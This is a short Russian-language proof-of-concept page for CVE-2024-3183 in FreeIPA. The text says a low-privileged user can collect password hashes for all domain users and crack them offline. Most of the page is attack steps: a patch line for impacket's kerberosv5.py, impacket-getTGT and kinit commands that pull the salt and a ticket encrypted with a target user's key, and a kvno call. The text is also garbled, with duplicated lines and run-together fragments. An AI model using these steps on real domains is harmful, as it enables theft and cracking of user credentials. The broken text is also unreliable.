
POC для CVE-2024-3183 (FreeIPA Rosting)
POC для CVE-2024-3183 (FreeIPA Rosting)
Воздействие: Пользователь с низкими привилегиями может получить хеш паролей всех пользователей домена и выполнить офлайн-перебор (kerberoasting).
Патч impacket-getTGT:
decoder.decode.defaultErrorState = stGetValueDecoderByTag в impacket/krb5/kerberosv5.py.decoder.decode.defaultErrorState = stGetValueDecoderByTag в impacket/krb5/kerberosv5.py.-service и опцией -debug, чтобы получить salt одной командой.
impacket-getTGT test.local/user -debug -service adminkinit user

printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt

kvno admin


1 - TGS, 2 - SALT, 3 - Пароли.
kinit -S target userи вы получите TGT, зашифрованный ключом целевого пользователя.